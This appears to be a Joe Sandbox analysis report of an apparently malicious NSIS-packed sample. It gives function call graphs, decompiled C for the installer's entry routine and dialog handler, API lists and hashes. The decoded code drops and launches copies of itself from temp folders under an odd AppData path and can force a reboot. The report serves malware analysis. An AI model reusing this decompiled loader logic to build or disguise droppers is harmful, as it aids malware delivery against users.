4417->4421 4419 403777 4541 406257 lstrcpynA 4419->4541 4552 40583e CreateDirectoryA 4420->4552 4557 4058bb CreateDirectoryA 4421->4557 4425 40380f SetCurrentDirectoryA 4428 40382a 4425->4428 4429 40381f 4425->4429 4483 403a3d 4426->4483 4561 406257 lstrcpynA 4428->4561 4560 406257 lstrcpynA 4429->4560 
4432 4062ea 17 API calls 4433 40386c DeleteFileA 4432->4433 4434 40387a CopyFileA 4433->4434 4440 403837 4433->4440 4434->4440 4435 4038c3 4436 406030 36 API calls 4435->4436 4436->4438 4437 406030 36 API calls 4437->4440 4542 403963 4438->4542 4439 4062ea 17 API calls 4439->4440 4440->4432 4440->4435 4440->4437 4440->4439 4442 4038ae CloseHandle 4440->4442 4562 4058f0 CreateProcessA 4440->4562 4442->4440 4443->4368 4444->4370 4446 406535 5 API calls 4445->4446 4447 40338e 4446->4447 4448 403398 4447->4448 4449 405be9 3 API calls 4447->4449 4448->4376 4450 4033a0 4449->4450 4451 4058bb 2 API calls 4450->4451 4452 4033a6 4451->4452 4453 405e19 2 API calls 4452->4453 4454 4033b1 4453->4454 4454->4376 4568 405dea GetFileAttributesA CreateFileA 4455->4568 4457 402f4c 4477 402f5c 4457->4477 4569 406257 lstrcpynA 4457->4569 4459 402f72 4460 405c30 2 API calls 4459->4460 4461 402f78 4460->4461 4570 406257 lstrcpynA 4461->4570 4463 402f83 GetFileSize 4464 40307d 4463->4464 4480 402f9a 4463->4480 4571 402ea8 4464->4571 4466 403086 4468 4030b6 GlobalAlloc 4466->4468 4466->4477 4606 40336b SetFilePointer 4466->4606 4582 40336b SetFilePointer 4468->4582 4470 4030e9 4474 402ea8 6 API calls 4470->4474 4472 40309f 4475 403355 ReadFile 4472->4475 4473 4030d1 4583 403143 4473->4583 4474->4477 4478 4030aa 4475->4478 4477->4385 4478->4468 4478->4477 4479 402ea8 6 API calls 4479->4480 4480->4464 4480->4470 4480->4477 4480->4479 4603 403355 4480->4603 4481 4030dd 4481->4477 4481->4481 4482 40311a SetFilePointer 4481->4482 4482->4477 4484 406663 5 API calls 4483->4484 4485 403a51 4484->4485 4486 403a57 4485->4486 4487 403a69 4485->4487 4627 4061b5 wsprintfA 4486->4627 4488 40613e 3 API calls 4487->4488 4489 403a94 4488->4489 4491 403ab2 lstrcatA 4489->4491 4493 40613e 3 API calls 4489->4493 4492 403a67 4491->4492 4612 403d02 4492->4612 4493->4491 4496 405cd7 18 API calls 4497 403ae4 4496->4497 4498 403b6d 4497->4498 4500 40613e 3 API calls 4497->4500 4499 405cd7 18 API calls 4498->4499 
4501 403b73 4499->4501 4502 403b10 4500->4502 4503 403b83 LoadImageA 4501->4503 4504 4062ea 17 API calls 4501->4504 4502->4498 4507 403b2c lstrlenA 4502->4507 4510 405c14 CharNextA 4502->4510 4505 403c29 4503->4505 4506 403baa RegisterClassA 4503->4506 4504->4503 4509 40140b 2 API calls 4505->4509 4508 403be0 SystemParametersInfoA CreateWindowExA 4506->4508 4538 403c33 4506->4538 4511 403b60 4507->4511 4512 403b3a lstrcmpiA 4507->4512 4508->4505 4513 403c2f 4509->4513 4515 403b2a 4510->4515 4514 405be9 3 API calls 4511->4514 4512->4511 4516 403b4a GetFileAttributesA 4512->4516 4517 403d02 18 API calls 4513->4517 4513->4538 4518 403b66 4514->4518 4515->4507 4519 403b56 4516->4519 4520 403c40 4517->4520 4628 406257 lstrcpynA 4518->4628 4519->4511 4522 405c30 2 API calls 4519->4522 4523 403c4c ShowWindow 4520->4523 4524 403ccf 4520->4524 4522->4511 4525 4065f5 3 API calls 4523->4525 4620 40544a OleInitialize 4524->4620 4528 403c64 4525->4528 4527 403cd5 4529 403cf1 4527->4529 4530 403cd9 4527->4530 4531 403c72 GetClassInfoA 4528->4531 4533 4065f5 3 API calls 4528->4533 4532 40140b 2 API calls 4529->4532 4536 40140b 2 API calls 4530->4536 4530->4538 4534 403c86 GetClassInfoA RegisterClassA 4531->4534 4535 403c9c DialogBoxParamA 4531->4535 4532->4538 4533->4531 4534->4535 4537 40140b 2 API calls 4535->4537 4536->4538 4537->4538 4538->4438 4539->4374 4540->4419 4541->4426 4543 40397b 4542->4543 4544 40396d CloseHandle 4542->4544 4640 4039a8 4543->4640 4544->4543 4547 405a19 67 API calls 4548 40379a OleUninitialize 4547->4548 4548->4395 4548->4396 4550 406663 5 API calls 4549->4550 4551 4037c6 lstrcatA 4550->4551 4551->4412 4551->4413 4553 403808 4552->4553 4554 40588f GetLastError 4552->4554 4553->4425 4554->4553 4555 40589e SetFileSecurityA 4554->4555 4555->4553 4556 4058b4 GetLastError 4555->4556 4556->4553 4558 4058cb 4557->4558 4559 4058cf GetLastError 4557->4559 4558->4425 4559->4558 4560->4428 4561->4440 4563 405923 CloseHandle 4562->4563 4564 40592f 4562->4564 

                                                            Control-flow Graph

                                                            [Control-flow graph for the function at 004033B3; nodes are marked Executed or Not Executed]
                                                            C-Code - Quality: 85%
                                                            			_entry_() {
                                                            				CHAR* _v8;
                                                            				long _v12;
                                                            				char _v16;
                                                            				long _v20;
                                                            				void* _v24;
                                                            				int _v28;
                                                            				struct _TOKEN_PRIVILEGES _v40;
                                                            				signed int _v42;
                                                            				long _v44;
                                                            				signed int _v48;
                                                            				char _v163;
                                                            				char _v175;
                                                            				signed short _v182;
                                                            				struct _OSVERSIONINFOA _v196;
                                                            				struct _SHFILEINFOA _v548;
                                                            				intOrPtr* _t87;
                                                            				char* _t93;
                                                            				void* _t95;
                                                            				void* _t99;
                                                            				CHAR* _t101;
                                                            				signed int _t103;
                                                            				int _t106;
                                                            				void* _t107;
                                                            				int _t108;
                                                            				void* _t110;
                                                            				void* _t134;
                                                            				signed int _t150;
                                                            				void* _t153;
                                                            				void* _t158;
                                                            				intOrPtr* _t159;
                                                            				void* _t170;
                                                            				CHAR* _t173;
                                                            				void _t179;
                                                            				void* _t198;
                                                            				void* _t199;
                                                            				signed char* _t213;
                                                            				CHAR* _t217;
                                                            				void* _t223;
                                                            
                                                            				_v20 = 0;
                                                            				_v8 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                            				_v12 = 0;
                                                            				_v16 = 0x20;
                                                            				SetErrorMode(0x8001); // executed
                                                            				_v196.szCSDVersion = 0;
                                                            				_v48 = 0;
                                                            				_v44 = 0;
                                                            				_v196.dwOSVersionInfoSize = 0x9c;
                                                            				if(GetVersionExA( &_v196) != 0) {
                                                            					L3:
                                                            					_t223 = _v196.dwPlatformId - 2;
                                                            					L4:
                                                            					if(_t223 < 0) {
                                                            						_v42 = _v42 & 0x00000000;
                                                            						if(_v175 < 0x41) {
                                                            							_v48 = 0;
                                                            						} else {
                                                            							_v48 = _v175 - 0x40;
                                                            						}
                                                            					}
                                                            					if(_v196.dwMajorVersion < 0xa) {
                                                            						_v182 = _v182 & 0x00000000;
                                                            					}
                                                            					 *0x4524d8 = _v196.dwBuildNumber;
                                                            					 *0x4524dc = (_v196.dwMajorVersion & 0x0000ffff | _v196.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                            					if( *0x4524de != 0x600) {
                                                            						_t159 = E00406663(0);
                                                            						if(_t159 != 0) {
                                                            							 *_t159(0xc00);
                                                            						}
                                                            					}
                                                            					_t217 = "UXTHEME";
                                                            					goto L14;
                                                            					while(1) {
                                                            						L37:
                                                            						_t179 =  *_t95;
                                                            						_t234 = _t179;
                                                            						if(_t179 == 0) {
                                                            							break;
                                                            						}
                                                            						__eflags = _t179 - 0x20;
                                                            						if(_t179 != 0x20) {
                                                            							L23:
                                                            							__eflags =  *_t95 - 0x22;
                                                            							_v16 = 0x20;
                                                            							if( *_t95 == 0x22) {
                                                            								_t95 = _t95 + 1;
                                                            								__eflags = _t95;
                                                            								_v16 = 0x22;
                                                            							}
                                                            							__eflags =  *_t95 - 0x2f;
                                                            							if( *_t95 != 0x2f) {
                                                            								L35:
                                                            								_t95 = E00405C14(_t95, _v16);
                                                            								__eflags =  *_t95 - 0x22;
                                                            								if(__eflags == 0) {
                                                            									_t95 = _t95 + 1;
                                                            									__eflags = _t95;
                                                            								}
                                                            								continue;
                                                            							} else {
                                                            								_t95 = _t95 + 1;
                                                            								__eflags =  *_t95 - 0x53;
                                                            								if( *_t95 != 0x53) {
                                                            									L30:
                                                            									__eflags =  *_t95 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                            									if( *_t95 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                            										L34:
                                                            										__eflags =  *(_t95 - 2) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                            										if( *(_t95 - 2) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                            											 *(_t95 - 2) =  *(_t95 - 2) & 0x00000000;
                                                            											__eflags = _t95 + 2;
                                                            											E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t95 + 2);
                                                            											L40:
                                                            											GetTempPathA(0x2000, 0x485000); // executed
                                                            											_t99 = E00403382(_t234);
                                                            											_t235 = _t99;
                                                            											if(_t99 != 0) {
                                                            												L43:
                                                            												DeleteFileA(0x483000); // executed
                                                            												_t101 = E00402F0C(_t237, _v12); // executed
                                                            												_v8 = _t101;
                                                            												if(_t101 != 0) {
                                                            													L53:
                                                            													E00403963();
                                                            													__imp__OleUninitialize();
                                                            													_t248 = _v8;
                                                            													if(_v8 == 0) {
                                                            														__eflags =  *0x4524b4;
                                                            														if( *0x4524b4 == 0) {
                                                            															L77:
                                                            															_t103 =  *0x4524cc;
                                                            															__eflags = _t103 - 0xffffffff;
                                                            															if(_t103 != 0xffffffff) {
                                                            																_v20 = _t103;
                                                            															}
                                                            															ExitProcess(_v20);
                                                            														}
                                                            														_t106 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24);
                                                            														__eflags = _t106;
                                                            														if(_t106 != 0) {
                                                            															LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v40.Privileges));
                                                            															_v40.PrivilegeCount = 1;
                                                            															_v28 = 2;
                                                            															AdjustTokenPrivileges(_v24, 0,  &_v40, 0, 0, 0);
                                                            														}
                                                            														_t107 = E00406663(4);
                                                            														__eflags = _t107;
                                                            														if(_t107 == 0) {
                                                            															L75:
                                                            															_t108 = ExitWindowsEx(2, 0x80040002);
                                                            															__eflags = _t108;
                                                            															if(_t108 != 0) {
                                                            																goto L77;
                                                            															}
                                                            															goto L76;
                                                            														} else {
                                                            															_t110 =  *_t107(0, 0, 0, 0x25, 0x80040002);
                                                            															__eflags = _t110;
                                                            															if(_t110 == 0) {
                                                            																L76:
                                                            																E0040140B(9);
                                                            																goto L77;
                                                            															}
                                                            															goto L75;
                                                            														}
                                                            													}
                                                            													E0040596D(_v8, 0x200010);
                                                            													ExitProcess(2);
                                                            												}
                                                            												if( *0x45243c == _t101) {
                                                            													L52:
                                                            													 *0x4524cc =  *0x4524cc | 0xffffffff;
                                                            													_v20 = E00403A3D( *0x4524cc);
                                                            													goto L53;
                                                            												}
                                                            												_t213 = E00405C14(0x47b000, _t101);
                                                            												if(_t213 < 0x47b000) {
                                                            													L49:
                                                            													_t244 = _t213 - 0x47b000;
                                                            													_v8 = "Error launching installer";
                                                            													if(_t213 < 0x47b000) {
                                                            														_t173 = E004058D8(_t248);
                                                            														lstrcatA(0x485000, "~nsu");
                                                            														if(_t173 != 0) {
                                                            															lstrcatA(0x485000, "A");
                                                            														}
                                                            														lstrcatA(0x485000, ".tmp");
                                                            														if(lstrcmpiA(0x485000, 0x481000) != 0) {
                                                            															_push(0x485000);
                                                            															if(_t173 == 0) {
                                                            																E004058BB();
                                                            															} else {
                                                            																E0040583E();
                                                            															}
                                                            															SetCurrentDirectoryA(0x485000);
                                                            															if("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes" == 0) {
                                                            																E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", 0x481000);
                                                            															}
                                                            															E00406257(0x453000, _v24);
                                                            															_t194 = "A";
                                                            															_v12 = 0x1a;
                                                            															 *0x455000 = "A";
                                                            															do {
                                                            																E004062EA(_t173, 0x432050, 0x485000, 0x432050,  *((intOrPtr*)( *0x452430 + 0x120)));
                                                            																DeleteFileA(0x432050);
                                                            																_t173 = 0;
                                                            																if(_v8 != 0 && CopyFileA(0x489000, 0x432050, 1) != 0) {
                                                            																	E00406030(_t194, 0x432050, 0);
                                                            																	E004062EA(0, 0x432050, 0x485000, 0x432050,  *((intOrPtr*)( *0x452430 + 0x124)));
                                                            																	_t134 = E004058F0(0x432050);
                                                            																	if(_t134 != 0) {
                                                            																		CloseHandle(_t134);
                                                            																		_v8 = 0;
                                                            																	}
                                                            																}
                                                            																 *0x455000 =  *0x455000 + 1;
                                                            																_t62 =  &_v12;
                                                            																 *_t62 = _v12 - 1;
                                                            															} while ( *_t62 != 0);
                                                            															E00406030(_t194, 0x485000, _t173);
                                                            														}
                                                            														goto L53;
                                                            													}
                                                            													 *_t213 =  *_t213 & 0x00000000;
                                                            													_t214 =  &(_t213[4]);
                                                            													if(E00405CD7(_t244,  &(_t213[4])) == 0) {
                                                            														goto L53;
                                                            													}
                                                            													E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t214);
                                                            													E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t214);
                                                            													_v8 = _v8 & 0x00000000;
                                                            													goto L52;
                                                            												}
                                                            												_t150 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                            												while( *_t213 != _t150) {
                                                            													_t213 = _t213 - 1;
                                                            													if(_t213 >= 0x47b000) {
                                                            														continue;
                                                            													}
                                                            													goto L49;
                                                            												}
                                                            												goto L49;
                                                            											}
                                                            											GetWindowsDirectoryA(0x485000, 0x1ffb);
                                                            											lstrcatA(0x485000, "\\Temp");
                                                            											_t153 = E00403382(_t235);
                                                            											_t236 = _t153;
                                                            											if(_t153 != 0) {
                                                            												goto L43;
                                                            											}
                                                            											GetTempPathA(0x1ffc, 0x485000);
                                                            											lstrcatA(0x485000, "Low");
                                                            											SetEnvironmentVariableA("TEMP", 0x485000);
                                                            											SetEnvironmentVariableA("TMP", 0x485000);
                                                            											_t158 = E00403382(_t236);
                                                            											_t237 = _t158;
                                                            											if(_t158 == 0) {
                                                            												goto L53;
                                                            											}
                                                            											goto L43;
                                                            										}
                                                            										goto L35;
                                                            									}
                                                            									_t198 =  *((intOrPtr*)(_t95 + 4));
                                                            									__eflags = _t198 - 0x20;
                                                            									if(_t198 == 0x20) {
                                                            										L33:
                                                            										_t42 =  &_v12;
                                                            										 *_t42 = _v12 | 0x00000004;
                                                            										__eflags =  *_t42;
                                                            										goto L34;
                                                            									}
                                                            									__eflags = _t198;
                                                            									if(_t198 != 0) {
                                                            										goto L34;
                                                            									}
                                                            									goto L33;
                                                            								}
                                                            								_t199 =  *(_t95 + 1);
                                                            								__eflags = _t199 - 0x20;
                                                            								if(_t199 == 0x20) {
                                                            									L29:
                                                            									 *0x4524c0 = 1;
                                                            									goto L30;
                                                            								}
                                                            								__eflags = _t199;
                                                            								if(_t199 != 0) {
                                                            									goto L30;
                                                            								}
                                                            								goto L29;
                                                            							}
                                                            						} else {
                                                            							goto L22;
                                                            						}
                                                            						do {
                                                            							L22:
                                                            							_t95 = _t95 + 1;
                                                            							__eflags =  *_t95 - 0x20;
                                                            						} while ( *_t95 == 0x20);
                                                            						goto L23;
                                                            					}
                                                            					goto L40;
                                                            					L14:
                                                            					E004065F5(_t217); // executed
                                                            					_t217 =  &(_t217[lstrlenA(_t217) + 1]);
                                                            					if( *_t217 != 0) {
                                                            						goto L14;
                                                            					} else {
                                                            						E00406663(0xb);
                                                            						 *0x452424 = E00406663(9);
                                                            						_t87 = E00406663(7);
                                                            						if(_t87 != 0) {
                                                            							_t87 =  *_t87(0x1e);
                                                            							if(_t87 != 0) {
                                                            								 *0x4524dc =  *0x4524dc | 0x00000080;
                                                            							}
                                                            						}
                                                            						__imp__#17(_t170);
                                                            						__imp__OleInitialize(0); // executed
                                                            						 *0x4524e0 = _t87;
                                                            						SHGetFileInfoA(0x434050, 0,  &_v548, 0x160, 0); // executed
                                                            						E00406257(0x44e420, "NSIS Error");
                                                            						E00406257(0x47b000, GetCommandLineA());
                                                            						 *0x452420 = 0x400000;
                                                            						_t93 = 0x47b000;
                                                            						if( *0x47b000 == 0x22) {
                                                            							_v16 = 0x22;
                                                            							_t93 = 0x47b001;
                                                            						}
                                                            						_t95 = CharNextA(E00405C14(_t93, _v16));
                                                            						_v24 = _t95;
                                                            						goto L37;
                                                            					}
                                                            				}
                                                            				_v196.dwOSVersionInfoSize = 0x94;
                                                            				GetVersionExA( &_v196);
                                                            				if(_v196.dwPlatformId != 2) {
                                                            					goto L4;
                                                            				} else {
                                                            					_v42 = 4;
                                                            					asm("sbb eax, eax");
                                                            					_v48 =  !( ~(_v196.szCSDVersion - 0x53)) & _v163 - 0x00000030;
                                                            					goto L3;
                                                            				}
                                                            			}


                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004033D6
                                                            • GetVersionExA.KERNEL32(?), ref: 004033FF
                                                            • GetVersionExA.KERNEL32(0000009C), ref: 00403416
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034DF
                                                            • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040351C
                                                            • OleInitialize.OLE32(00000000), ref: 00403523
                                                            • SHGetFileInfoA.SHELL32(00434050,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403541
                                                            • GetCommandLineA.KERNEL32(0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00403556
                                                            • CharNextA.USER32(00000000), ref: 00403590
                                                            • GetTempPathA.KERNEL32(00002000,00485000), ref: 00403689
                                                            • GetWindowsDirectoryA.KERNEL32(00485000,00001FFB,?,00000007,00000009,0000000B), ref: 0040369A
                                                            • lstrcatA.KERNEL32(00485000,\Temp,?,00000007,00000009,0000000B), ref: 004036A6
                                                            • GetTempPathA.KERNEL32(00001FFC,00485000), ref: 004036BA
                                                            • lstrcatA.KERNEL32(00485000,Low,?,00000007,00000009,0000000B), ref: 004036C2
                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,00485000,00485000,Low,?,00000007,00000009,0000000B), ref: 004036D3
                                                            • SetEnvironmentVariableA.KERNEL32(TMP,00485000,?,00000007,00000009,0000000B), ref: 004036DB
                                                            • DeleteFileA.KERNELBASE(00483000,?,00000007,00000009,0000000B), ref: 004036EF
                                                            • OleUninitialize.OLE32 ref: 0040379A
                                                            • ExitProcess.KERNEL32 ref: 004037BB
                                                            • lstrcatA.KERNEL32(00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037CE
                                                            • lstrcatA.KERNEL32(00485000,0040A14C,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037DD
                                                            • lstrcatA.KERNEL32(00485000,.tmp,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037E8
                                                            • lstrcmpiA.KERNEL32(00485000,00481000,00485000,.tmp,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037F4
                                                            • SetCurrentDirectoryA.KERNEL32(00485000,00485000,?,00000007,00000009,0000000B), ref: 00403810
                                                            • DeleteFileA.KERNEL32(00432050,00432050,?,00453000,?,?,00000007,00000009,0000000B), ref: 0040386D
                                                            • CopyFileA.KERNEL32 ref: 00403882
                                                            • CloseHandle.KERNEL32(00000000), ref: 004038AF
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038DD
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004038E4
                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403917
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040393C
                                                            • ExitProcess.KERNEL32 ref: 0040395D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                            • String ID: "$.tmp$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Error launching installer$Low$NSIS Error$P C$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 1000954069-3321099877
                                                            • Opcode ID: e91d8d7e0acfa7466b43f1949bb7c617c824f3dc3e8a6da219fe6e6d5f30964f
                                                            • Instruction ID: 35a904cfeb39216351fef3eee688bc31b7ac6ceac067f98900564130ed648918
                                                            • Opcode Fuzzy Hash: e91d8d7e0acfa7466b43f1949bb7c617c824f3dc3e8a6da219fe6e6d5f30964f
                                                            • Instruction Fuzzy Hash: DBE10470904354AADB216F758D49BAF7EB8AF4630AF0440BFE445B62D2C77C4A44CB2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 144 4054b6-4054d2 145 405661-405667 144->145 146 4054d8-40559f GetDlgItem * 3 call 404309 call 404bfa GetClientRect GetSystemMetrics SendMessageA * 2 144->146 147 405691-40569d 145->147 148 405669-40568b GetDlgItem CreateThread CloseHandle 145->148 164 4055a1-4055bb SendMessageA * 2 146->164 165 4055bd-4055c0 146->165 151 4056bf-4056c5 147->151 152 40569f-4056a5 147->152 148->147 156 4056c7-4056cd 151->156 157 40571a-40571d 151->157 154 4056e0-4056e7 call 40433b 152->154 155 4056a7-4056ba ShowWindow * 2 call 404309 152->155 168 4056ec-4056f0 154->168 155->151 161 4056f3-405703 ShowWindow 156->161 162 4056cf-4056db call 4042ad 156->162 157->154 159 40571f-405725 157->159 159->154 166 405727-40573a SendMessageA 159->166 169 405713-405715 call 4042ad 161->169 170 405705-40570e call 405378 161->170 162->154 164->165 172 4055d0-4055e7 call 4042d4 165->172 173 4055c2-4055ce SendMessageA 165->173 174 405740-40576c CreatePopupMenu call 4062ea AppendMenuA 166->174 175 405837-405839 166->175 169->157 170->169 183 4055e9-4055fd ShowWindow 172->183 184 40561d-40563e GetDlgItem SendMessageA 172->184 173->172 181 405781-405797 TrackPopupMenu 174->181 182 40576e-40577e GetWindowRect 174->182 175->168 181->175 185 40579d-4057b7 181->185 182->181 186 40560c 183->186 187 4055ff-40560a ShowWindow 183->187 184->175 188 405644-40565c SendMessageA * 2 184->188 189 4057bc-4057d7 SendMessageA 185->189 190 405612-405618 call 404309 186->190 187->190 188->175 189->189 191 4057d9-4057f9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->191 190->184 193 4057fb-40581b SendMessageA 191->193 193->193 194 40581d-405831 GlobalUnlock SetClipboardData CloseClipboard 193->194 194->175
                                                            C-Code - Quality: 95%
                                                            			E004054B6(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                            				struct HWND__* _v8;
                                                            				struct tagRECT _v24;
                                                            				void* _v32;
                                                            				signed int _v36;
                                                            				int _v40;
                                                            				int _v44;
                                                            				signed int _v48;
                                                            				int _v52;
                                                            				void* _v56;
                                                            				void* _v64;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HWND__* _t89;
                                                            				long _t90;
                                                            				int _t95;
                                                            				void* _t102;
                                                            				intOrPtr _t113;
                                                            				void* _t121;
                                                            				intOrPtr _t124;
                                                            				struct HWND__* _t128;
                                                            				int _t150;
                                                            				int _t153;
                                                            				long _t157;
                                                            				struct HWND__* _t161;
                                                            				struct HMENU__* _t163;
                                                            				long _t165;
                                                            				void* _t166;
                                                            				char* _t167;
                                                            				char* _t168;
                                                            				int _t169;
                                                            
                                                            				_t157 = _a8;
                                                            				_t150 = 0;
                                                            				_v8 =  *0x44e404;
                                                            				if(_t157 != 0x110) {
                                                            					if(_t157 == 0x405) {
                                                            						_t121 = CreateThread(0, 0, E0040544A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
                                                            						CloseHandle(_t121);
                                                            					}
                                                            					if(_t157 != 0x111) {
                                                            						L17:
                                                            						if(_t157 != 0x404) {
                                                            							L25:
                                                            							if(_t157 != 0x7b) {
                                                            								goto L20;
                                                            							}
                                                            							_t89 = _v8;
                                                            							if(_a12 != _t89) {
                                                            								goto L20;
                                                            							}
                                                            							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                            							_a12 = _t90;
                                                            							if(_t90 <= _t150) {
                                                            								L36:
                                                            								return 0;
                                                            							}
                                                            							_t163 = CreatePopupMenu();
                                                            							AppendMenuA(_t163, _t150, 1, E004062EA(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                            							_t95 = _a16;
                                                            							_t153 = _a16 >> 0x10;
                                                            							if(_a16 == 0xffffffff) {
                                                            								GetWindowRect(_v8,  &_v24);
                                                            								_t95 = _v24.left;
                                                            								_t153 = _v24.top;
                                                            							}
                                                            							if(TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150) == 1) {
                                                            								_t165 = 1;
                                                            								_v56 = _t150;
                                                            								_v44 = 0x43c090;
                                                            								_v40 = 0x8000;
                                                            								_a4 = _a12;
                                                            								do {
                                                            									_a4 = _a4 - 1;
                                                            									_t165 = _t165 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                            								} while (_a4 != _t150);
                                                            								OpenClipboard(_t150);
                                                            								EmptyClipboard();
                                                            								_t102 = GlobalAlloc(0x42, _t165);
                                                            								_a4 = _t102;
                                                            								_t166 = GlobalLock(_t102);
                                                            								do {
                                                            									_v44 = _t166;
                                                            									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                            									 *_t167 = 0xd;
                                                            									_t168 = _t167 + 1;
                                                            									 *_t168 = 0xa;
                                                            									_t166 = _t168 + 1;
                                                            									_t150 = _t150 + 1;
                                                            								} while (_t150 < _a12);
                                                            								GlobalUnlock(_a4);
                                                            								SetClipboardData(1, _a4);
                                                            								CloseClipboard();
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						if( *0x44e3ec == _t150) {
                                                            							ShowWindow( *0x452428, 8);
                                                            							if( *0x4524ac == _t150) {
                                                            								_t113 =  *0x438068; // 0x720a3c
                                                            								E00405378( *((intOrPtr*)(_t113 + 0x34)), _t150);
                                                            							}
                                                            							E004042AD(1);
                                                            							goto L25;
                                                            						}
                                                            						 *0x436060 = 2;
                                                            						E004042AD(0x78);
                                                            						goto L20;
                                                            					} else {
                                                            						if(_a12 != 0x403) {
                                                            							L20:
                                                            							return E0040433B(_t157, _a12, _a16);
                                                            						}
                                                            						ShowWindow( *0x44e3f0, _t150);
                                                            						ShowWindow(_v8, 8);
                                                            						E00404309(_v8);
                                                            						goto L17;
                                                            					}
                                                            				}
                                                            				_v48 = _v48 | 0xffffffff;
                                                            				_v36 = _v36 | 0xffffffff;
                                                            				_t169 = 2;
                                                            				_v56 = _t169;
                                                            				_v52 = 0;
                                                            				_v44 = 0;
                                                            				_v40 = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_t124 =  *0x452430;
                                                            				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                            				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                            				 *0x44e3f0 = GetDlgItem(_a4, 0x403);
                                                            				 *0x44e3e8 = GetDlgItem(_a4, 0x3ee);
                                                            				_t128 = GetDlgItem(_a4, 0x3f8);
                                                            				 *0x44e404 = _t128;
                                                            				_v8 = _t128;
                                                            				E00404309( *0x44e3f0);
                                                            				 *0x44e3f4 = E00404BFA(4);
                                                            				 *0x44e40c = 0;
                                                            				GetClientRect(_v8,  &_v24);
                                                            				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                            				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                            				if(_a12 >= 0) {
                                                            					SendMessageA(_v8, 0x1001, 0, _a12);
                                                            					SendMessageA(_v8, 0x1026, 0, _a12);
                                                            				}
                                                            				if(_a8 >= _t150) {
                                                            					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                            				}
                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                            				_push(0x1b);
                                                            				E004042D4(_a4);
                                                            				if(( *0x452438 & 0x00000003) != 0) {
                                                            					ShowWindow( *0x44e3f0, _t150); // executed
                                                            					if(( *0x452438 & 0x00000002) != 0) {
                                                            						 *0x44e3f0 = _t150;
                                                            					} else {
                                                            						ShowWindow(_v8, 8); // executed
                                                            					}
